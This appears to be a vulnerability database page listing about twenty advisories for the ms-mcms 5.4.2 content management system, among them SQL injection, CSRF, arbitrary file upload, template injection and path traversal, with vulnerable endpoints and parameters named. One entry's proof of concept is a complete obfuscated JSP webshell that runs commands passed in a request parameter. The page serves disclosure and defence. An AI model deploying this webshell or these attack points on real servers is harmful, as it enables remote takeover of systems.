net.mingsoft:ms-mcms@5.4.2 vulnerabilities

Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') due to the front-end file upload process. An attacker can execute arbitrary commands on the server by uploading a malicious file.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type via a crafted POST request to /ms/file/upload.do, due to improper filtering for file extensions. An attacker can upload arbitrary files, potentially leading to remote code execution or other malicious activities.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Information Exposure via a crafted script to the password parameter. An attacker can obtain sensitive information by sending a specially crafted request to the affected parameter.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via the categoryType parameter at /content/list.do. An attacker can manipulate the backend database by injecting malicious SQL commands.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) allowing an attacker to add an administrator account via ms/basic/manager/save.do.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) where it's possible to add an administrator account via ms/basic/manager/save.do.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via /role/saveOrUpdateRole.do which allows attackers to escalate privileges and modify data.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via the categoryId parameter in IContentDao.xml.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via search.do in /web/MCmsAction.java.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to External Control of File Name or Path via the oldFileName variable of the writeFileContent function. If this variable is not equal to the fileName variable, the oldFileName file gets deleted.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Server-side Template Injection (SSTI) via the Template Management module, where it is possible to add a template with a crafted payload in order to execute commands on the underlaying server.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Arbitrary File Upload via the /file/upload endpoint. A .jspx file will circumvent the filtering set in place and allow the attacker to get a webshell.

##PoC

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
    BASE64Decoder decoder = new BASE64Decoder();
    Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
    Process e = (Process)
            rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                    String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                    Object[]{}), request.getParameter("cmd") );
    java.io.InputStream in = e.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Arbitrary File Deletion via the unZip() function in net/mingsoft/basic/action/TemplateAction.java, where after unzipping the file specified is deleted (whether it exists or not).

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection due to improper input sanitization in categoryId parameter in ContentBizImpl.java.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Arbitrary File Upload via the upload method. The only files that are restricted for upload are .exe and .jsp. This can lead to RCE when a webshell with a .jspx type, for example, is uploaded this way.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via the IDictBiz interface, through which the value of orderBy is directly spliced into the SQL statement without any filtering, allowing to exfiltrate sensitive data.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via the IModelDataBiz interface, which requires implementing the queryDiyFormData method. The way it is implemented allows the orderBy value to be injected into the statement when resolving a GET request.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Arbitrary Code Execution which have a hardcoded shiro-key, allowing attackers to exploit it.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Arbitrary File Upload via the com\mingsoft\basic\action\web\FileAction.java component. Since the upload interface does not verify the user login status, an attacker can use this interface to upload files without setting a cookie.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Directory Traversal via the com\mingsoft\cms\action\GeneraterAction.java file. An attacker can write a .jsp file to an arbitrary directory via a ../ Directory Traversal in the url parameter.

There is no fixed version for net.mingsoft:ms-mcms.